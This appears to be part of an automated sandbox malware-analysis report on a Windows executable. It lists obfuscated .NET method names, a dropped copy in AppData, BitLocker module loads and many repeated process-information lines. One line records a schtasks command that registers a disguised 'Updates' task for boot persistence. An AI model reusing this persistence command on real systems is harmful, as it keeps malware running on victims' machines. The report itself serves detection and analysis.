            Source: 0.2.JeouiaPf03mHSBH.exe.9860000.6.raw.unpack, P4EZ97PrnE5AKAeyrT.csHigh entropy of concatenated method names: 'TP4NvITvAh', 'H5JNCo5R7f', 'pqYOGX8pxs', 'gxCOAQOWc0', 'nTtNbk9ZDj', 'C2tNK6jCV5', 'gEXNdZPvb0', 'OBaNmWjeql', 'uJBNtW5JPM', 'G9nNkJvnw0'
            Source: 0.2.JeouiaPf03mHSBH.exe.47a0010.2.raw.unpack, xuMyoRtLSwKEbYyOZUV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KmanmUN8YL', 'slCntFCRP1', 'DGVnkhMcT2', 'WYan3Iku3G', 'c9TnHF8UNW', 'yK5n2WtmH8', 'M9VnfiLSQ6'
            Source: 0.2.JeouiaPf03mHSBH.exe.47a0010.2.raw.unpack, eSNV4R7L83U8700pLS.csHigh entropy of concatenated method names: 'MtcRM9bVic', 'ER3RKPhse6', 'zubRm0OPSY', 'OkyRtdaFLg', 'woXRyfgb99', 'Q5bR6hkon6', 'ppbRcX6GU8', 'wefRoKFYXZ', 'whKRLxrp83', 'LoaRxgykcu'
            Source: 0.2.JeouiaPf03mHSBH.exe.47a0010.2.raw.unpack, Ir9XX8BGVgqJqqBrpk.csHigh entropy of concatenated method names: 'ECUAreMA4w', 'vSUA8cEuOv', 'lKEAUl719V', 'cbxAXWWNkD', 'S7uARD57aH', 'rKuA1NGB9N', 'sx4f5L1iFwUIOxrdu9', 'FSlhgyladT20To6lNg', 'kqwAAymbYP', 'RCfAqlvjMe'
            Source: 0.2.JeouiaPf03mHSBH.exe.47a0010.2.raw.unpack, g0YyKflPy8yK9w4w4q.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'WdRV0fBINl', 'E77VCFWqHB', 'kppVzGGeNi', 'lWbqGLaBsp', 'JrhqAWOIbR', 'AffqVob2na', 'n3Mqq5Ugf4', 'SUwLj23DCSaFwCid0cw'
            Source: 0.2.JeouiaPf03mHSBH.exe.47a0010.2.raw.unpack, xW2e2hhdjSEZvnPwMJ.csHigh entropy of concatenated method names: 'pkyPploLV', 'jHt7Xl4FE', 'V0J9yZNMC', 'oyhi8Tgs5', 'L8AB3U1EA', 'YnkF5CwJm', 'H1F04HXMpEwZ78Gcy4', 'Y8OUtKwlGgGQcldjGC', 'dGyO6RtG4', 'w5cnaaqiq'
            Source: 0.2.JeouiaPf03mHSBH.exe.47a0010.2.raw.unpack, L3orJ2zu7nl0jhEWia.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Ob0h40Y2WA', 'pkQhR9NCW3', 'A1Wh1J4N9T', 'v8AhNDcABZ', 'x2ChOGPWGx', 'NqthhA085q', 'ppHhnnWd72'
            Source: 0.2.JeouiaPf03mHSBH.exe.47a0010.2.raw.unpack, QXr51diiCwgGVrSkMt.csHigh entropy of concatenated method names: 'ovNrY2eA39', 'B6urZg286R', 'YcArPUop1n', 'C0Yr7QAbJM', 'yVcrSbLl7X', 'vder9EuKB8', 'N8NriBkkgy', 'kewrTFBaFd', 'VmrrBML0PE', 'HpZrFdW5Ie'
            Source: 0.2.JeouiaPf03mHSBH.exe.47a0010.2.raw.unpack, WTlef4eAPctGxvi0QH.csHigh entropy of concatenated method names: 'ToString', 'z6y1bSCR37', 'U051yYEgum', 'e9D16bGWZ2', 'Uks1c9QiJJ', 'iG61oaxI4K', 'duN1LY8bCW', 'VsQ1x9Vqds', 'JOv1a3LuhF', 'tjQ1uXouSI'
            Source: 0.2.JeouiaPf03mHSBH.exe.47a0010.2.raw.unpack, Ckc4Bt89d71YMmb0gd.csHigh entropy of concatenated method names: 'VZUqjyYCR1', 'AVmqwM9nI5', 'qaoqIKhr2W', 'm5oqE5ghbR', 'Sq7qJICCCU', 'wbLqskj9IG', 'ArCqruJZWu', 'B1Fq8BJNPV', 'vghqDBWamN', 'JVnqUTt0Qg'
            Source: 0.2.JeouiaPf03mHSBH.exe.47a0010.2.raw.unpack, upI346SlGxxHgqWU2Z.csHigh entropy of concatenated method names: 'RefImHudQi', 'wQXIt8PNw7', 'yLoIkLH2ag', 'AG9I3ZMigM', 'GicIHRIj8A', 'Ky6I2kNiXA', 'zoaIfYtOE9', 'dnUIvpgmyw', 'zWYI0t26Z8', 'ilFIC8Gj1e'
            Source: 0.2.JeouiaPf03mHSBH.exe.47a0010.2.raw.unpack, N4Ll5GXUfMH1RvWFIe.csHigh entropy of concatenated method names: 'THSOwucHsu', 'uFkOIAalH3', 'dcLOEjy1AI', 'J0kOJQlr47', 'YmOOsko1dy', 'KUEOr8I0eN', 'knJO8IFVPL', 'wskODm7qLr', 'RTuOUv777R', 'JSnOXyXsUn'
            Source: 0.2.JeouiaPf03mHSBH.exe.47a0010.2.raw.unpack, EhHNmbwysvM5y7Q7NK.csHigh entropy of concatenated method names: 'Dispose', 'cAJA0FoScx', 't0XVyWAYyO', 'cueQQhtewL', 'iAfACmHiEl', 'bv4AzZtX4i', 'ProcessDialogKey', 'JdGVG7ZuRL', 'YqmVAOVnTh', 'pc4VVV03g6'
            Source: 0.2.JeouiaPf03mHSBH.exe.47a0010.2.raw.unpack, KdbVMg3oVedipeWcRs.csHigh entropy of concatenated method names: 'ASrE7N6av3', 'XTpE9kBpqi', 'RpvETaBDqf', 'BleEBJFivm', 'FDDERubRAj', 'm52E18Uxi6', 'Yn2ENTBN02', 'EJSEO5rH4w', 'bbFEh6Res1', 'CXHEnm0v5H'
            Source: 0.2.JeouiaPf03mHSBH.exe.47a0010.2.raw.unpack, zQBAkGmM1gWTxtBe8p.csHigh entropy of concatenated method names: 'yEPOlKk3yT', 'XMeOyIb1xr', 'qBMO6dUWce', 'YPJOcD6wT0', 'xrGOmhVGa6', 'I07OolUhgu', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.JeouiaPf03mHSBH.exe.47a0010.2.raw.unpack, uJSmQAkIQdAqhIUfEM.csHigh entropy of concatenated method names: 'qcArw02tTS', 'WuhrE4PP3I', 'MmIrsjWcJl', 'XxBsCqZ04n', 'cduszkwOrX', 'npNrGvSA0b', 'LEUrAoZQik', 'DburVRMkv7', 'iCBrqZgLFP', 'qvYr5iFCrk'
            Source: 0.2.JeouiaPf03mHSBH.exe.47a0010.2.raw.unpack, En9Hs2FGUX7pUj1W3H.csHigh entropy of concatenated method names: 'sIxsjMBhsk', 'zDysIPLPWM', 'XnusJQp43l', 'bdLsrlqJUt', 'YANs8PxbHZ', 'nZ1JHqhShR', 'wWLJ2egeGi', 'gifJfSN5iY', 'VKCJv5S3Dq', 'gVHJ0d8Zg5'
            Source: 0.2.JeouiaPf03mHSBH.exe.47a0010.2.raw.unpack, dw3ZvYWG4S3ZxXG1Ra.csHigh entropy of concatenated method names: 'mk7hAdwjCo', 'diAhqxKTuw', 'hSuh5nEK4U', 'PNFhw6MfBa', 'o94hIb1QBw', 'ziJhJbU4ku', 'YdThsnSQud', 'qayOfrDUUa', 'DVdOvC1WN0', 'okIO09cAQs'
            Source: 0.2.JeouiaPf03mHSBH.exe.47a0010.2.raw.unpack, tpjUdVuctmg3J3VYWu.csHigh entropy of concatenated method names: 'Xua4TRCSDm', 'uAU4BrG6yG', 'ed74lbsOq7', 'PCD4yZtL1C', 'ily4cyVxSN', 'PrF4oywRMv', 'G834xFxQJV', 'A524anN0or', 'cfa4MEl0uH', 'U9v4blVbNG'
            Source: 0.2.JeouiaPf03mHSBH.exe.47a0010.2.raw.unpack, Gs7da6tvYi6y250LyZF.csHigh entropy of concatenated method names: 'zpFhYrNoNx', 'b6ghZnOKx1', 'UYChPoS7HD', 'iQjh7DNDcS', 'IQjhSUj8Je', 'uN5h9y4oQq', 'ylThif8aIl', 'fmUhTVDZDX', 'ugchBVSq3p', 'UPshFoxFDq'
            Source: 0.2.JeouiaPf03mHSBH.exe.47a0010.2.raw.unpack, pWe3CFoJYBpwqoFcvk.csHigh entropy of concatenated method names: 'X2YJS7nG9G', 'iPOJiE0YSB', 'xduE6Vg2Lp', 'jrGEc7Ece4', 'skGEonossi', 'XSOEL9h12p', 'XLCExnkK47', 'c7jEaSBggH', 'OmDEuctc5a', 'yJxEMjYCcZ'
            Source: 0.2.JeouiaPf03mHSBH.exe.47a0010.2.raw.unpack, P4EZ97PrnE5AKAeyrT.csHigh entropy of concatenated method names: 'TP4NvITvAh', 'H5JNCo5R7f', 'pqYOGX8pxs', 'gxCOAQOWc0', 'nTtNbk9ZDj', 'C2tNK6jCV5', 'gEXNdZPvb0', 'OBaNmWjeql', 'uJBNtW5JPM', 'G9nNkJvnw0'
            Source: 0.2.JeouiaPf03mHSBH.exe.4827230.1.raw.unpack, xuMyoRtLSwKEbYyOZUV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KmanmUN8YL', 'slCntFCRP1', 'DGVnkhMcT2', 'WYan3Iku3G', 'c9TnHF8UNW', 'yK5n2WtmH8', 'M9VnfiLSQ6'
            Source: 0.2.JeouiaPf03mHSBH.exe.4827230.1.raw.unpack, eSNV4R7L83U8700pLS.csHigh entropy of concatenated method names: 'MtcRM9bVic', 'ER3RKPhse6', 'zubRm0OPSY', 'OkyRtdaFLg', 'woXRyfgb99', 'Q5bR6hkon6', 'ppbRcX6GU8', 'wefRoKFYXZ', 'whKRLxrp83', 'LoaRxgykcu'
            Source: 0.2.JeouiaPf03mHSBH.exe.4827230.1.raw.unpack, Ir9XX8BGVgqJqqBrpk.csHigh entropy of concatenated method names: 'ECUAreMA4w', 'vSUA8cEuOv', 'lKEAUl719V', 'cbxAXWWNkD', 'S7uARD57aH', 'rKuA1NGB9N', 'sx4f5L1iFwUIOxrdu9', 'FSlhgyladT20To6lNg', 'kqwAAymbYP', 'RCfAqlvjMe'
            Source: 0.2.JeouiaPf03mHSBH.exe.4827230.1.raw.unpack, g0YyKflPy8yK9w4w4q.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'WdRV0fBINl', 'E77VCFWqHB', 'kppVzGGeNi', 'lWbqGLaBsp', 'JrhqAWOIbR', 'AffqVob2na', 'n3Mqq5Ugf4', 'SUwLj23DCSaFwCid0cw'
            Source: 0.2.JeouiaPf03mHSBH.exe.4827230.1.raw.unpack, xW2e2hhdjSEZvnPwMJ.csHigh entropy of concatenated method names: 'pkyPploLV', 'jHt7Xl4FE', 'V0J9yZNMC', 'oyhi8Tgs5', 'L8AB3U1EA', 'YnkF5CwJm', 'H1F04HXMpEwZ78Gcy4', 'Y8OUtKwlGgGQcldjGC', 'dGyO6RtG4', 'w5cnaaqiq'
            Source: 0.2.JeouiaPf03mHSBH.exe.4827230.1.raw.unpack, L3orJ2zu7nl0jhEWia.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Ob0h40Y2WA', 'pkQhR9NCW3', 'A1Wh1J4N9T', 'v8AhNDcABZ', 'x2ChOGPWGx', 'NqthhA085q', 'ppHhnnWd72'
            Source: 0.2.JeouiaPf03mHSBH.exe.4827230.1.raw.unpack, QXr51diiCwgGVrSkMt.csHigh entropy of concatenated method names: 'ovNrY2eA39', 'B6urZg286R', 'YcArPUop1n', 'C0Yr7QAbJM', 'yVcrSbLl7X', 'vder9EuKB8', 'N8NriBkkgy', 'kewrTFBaFd', 'VmrrBML0PE', 'HpZrFdW5Ie'
            Source: 0.2.JeouiaPf03mHSBH.exe.4827230.1.raw.unpack, WTlef4eAPctGxvi0QH.csHigh entropy of concatenated method names: 'ToString', 'z6y1bSCR37', 'U051yYEgum', 'e9D16bGWZ2', 'Uks1c9QiJJ', 'iG61oaxI4K', 'duN1LY8bCW', 'VsQ1x9Vqds', 'JOv1a3LuhF', 'tjQ1uXouSI'
            Source: 0.2.JeouiaPf03mHSBH.exe.4827230.1.raw.unpack, Ckc4Bt89d71YMmb0gd.csHigh entropy of concatenated method names: 'VZUqjyYCR1', 'AVmqwM9nI5', 'qaoqIKhr2W', 'm5oqE5ghbR', 'Sq7qJICCCU', 'wbLqskj9IG', 'ArCqruJZWu', 'B1Fq8BJNPV', 'vghqDBWamN', 'JVnqUTt0Qg'
            Source: 0.2.JeouiaPf03mHSBH.exe.4827230.1.raw.unpack, upI346SlGxxHgqWU2Z.csHigh entropy of concatenated method names: 'RefImHudQi', 'wQXIt8PNw7', 'yLoIkLH2ag', 'AG9I3ZMigM', 'GicIHRIj8A', 'Ky6I2kNiXA', 'zoaIfYtOE9', 'dnUIvpgmyw', 'zWYI0t26Z8', 'ilFIC8Gj1e'
            Source: 0.2.JeouiaPf03mHSBH.exe.4827230.1.raw.unpack, N4Ll5GXUfMH1RvWFIe.csHigh entropy of concatenated method names: 'THSOwucHsu', 'uFkOIAalH3', 'dcLOEjy1AI', 'J0kOJQlr47', 'YmOOsko1dy', 'KUEOr8I0eN', 'knJO8IFVPL', 'wskODm7qLr', 'RTuOUv777R', 'JSnOXyXsUn'
            Source: 0.2.JeouiaPf03mHSBH.exe.4827230.1.raw.unpack, EhHNmbwysvM5y7Q7NK.csHigh entropy of concatenated method names: 'Dispose', 'cAJA0FoScx', 't0XVyWAYyO', 'cueQQhtewL', 'iAfACmHiEl', 'bv4AzZtX4i', 'ProcessDialogKey', 'JdGVG7ZuRL', 'YqmVAOVnTh', 'pc4VVV03g6'
            Source: 0.2.JeouiaPf03mHSBH.exe.4827230.1.raw.unpack, KdbVMg3oVedipeWcRs.csHigh entropy of concatenated method names: 'ASrE7N6av3', 'XTpE9kBpqi', 'RpvETaBDqf', 'BleEBJFivm', 'FDDERubRAj', 'm52E18Uxi6', 'Yn2ENTBN02', 'EJSEO5rH4w', 'bbFEh6Res1', 'CXHEnm0v5H'
            Source: 0.2.JeouiaPf03mHSBH.exe.4827230.1.raw.unpack, zQBAkGmM1gWTxtBe8p.csHigh entropy of concatenated method names: 'yEPOlKk3yT', 'XMeOyIb1xr', 'qBMO6dUWce', 'YPJOcD6wT0', 'xrGOmhVGa6', 'I07OolUhgu', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.JeouiaPf03mHSBH.exe.4827230.1.raw.unpack, uJSmQAkIQdAqhIUfEM.csHigh entropy of concatenated method names: 'qcArw02tTS', 'WuhrE4PP3I', 'MmIrsjWcJl', 'XxBsCqZ04n', 'cduszkwOrX', 'npNrGvSA0b', 'LEUrAoZQik', 'DburVRMkv7', 'iCBrqZgLFP', 'qvYr5iFCrk'
            Source: 0.2.JeouiaPf03mHSBH.exe.4827230.1.raw.unpack, En9Hs2FGUX7pUj1W3H.csHigh entropy of concatenated method names: 'sIxsjMBhsk', 'zDysIPLPWM', 'XnusJQp43l', 'bdLsrlqJUt', 'YANs8PxbHZ', 'nZ1JHqhShR', 'wWLJ2egeGi', 'gifJfSN5iY', 'VKCJv5S3Dq', 'gVHJ0d8Zg5'
            Source: 0.2.JeouiaPf03mHSBH.exe.4827230.1.raw.unpack, dw3ZvYWG4S3ZxXG1Ra.csHigh entropy of concatenated method names: 'mk7hAdwjCo', 'diAhqxKTuw', 'hSuh5nEK4U', 'PNFhw6MfBa', 'o94hIb1QBw', 'ziJhJbU4ku', 'YdThsnSQud', 'qayOfrDUUa', 'DVdOvC1WN0', 'okIO09cAQs'
            Source: 0.2.JeouiaPf03mHSBH.exe.4827230.1.raw.unpack, tpjUdVuctmg3J3VYWu.csHigh entropy of concatenated method names: 'Xua4TRCSDm', 'uAU4BrG6yG', 'ed74lbsOq7', 'PCD4yZtL1C', 'ily4cyVxSN', 'PrF4oywRMv', 'G834xFxQJV', 'A524anN0or', 'cfa4MEl0uH', 'U9v4blVbNG'
            Source: 0.2.JeouiaPf03mHSBH.exe.4827230.1.raw.unpack, Gs7da6tvYi6y250LyZF.csHigh entropy of concatenated method names: 'zpFhYrNoNx', 'b6ghZnOKx1', 'UYChPoS7HD', 'iQjh7DNDcS', 'IQjhSUj8Je', 'uN5h9y4oQq', 'ylThif8aIl', 'fmUhTVDZDX', 'ugchBVSq3p', 'UPshFoxFDq'
            Source: 0.2.JeouiaPf03mHSBH.exe.4827230.1.raw.unpack, pWe3CFoJYBpwqoFcvk.csHigh entropy of concatenated method names: 'X2YJS7nG9G', 'iPOJiE0YSB', 'xduE6Vg2Lp', 'jrGEc7Ece4', 'skGEonossi', 'XSOEL9h12p', 'XLCExnkK47', 'c7jEaSBggH', 'OmDEuctc5a', 'yJxEMjYCcZ'
            Source: 0.2.JeouiaPf03mHSBH.exe.4827230.1.raw.unpack, P4EZ97PrnE5AKAeyrT.csHigh entropy of concatenated method names: 'TP4NvITvAh', 'H5JNCo5R7f', 'pqYOGX8pxs', 'gxCOAQOWc0', 'nTtNbk9ZDj', 'C2tNK6jCV5', 'gEXNdZPvb0', 'OBaNmWjeql', 'uJBNtW5JPM', 'G9nNkJvnw0'
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeFile created: C:\Users\user\AppData\Roaming\snTlRrBza.exeJump to dropped file

            Boot Survival

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\snTlRrBza" /XML "C:\Users\user\AppData\Local\Temp\tmpA933.tmp"

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
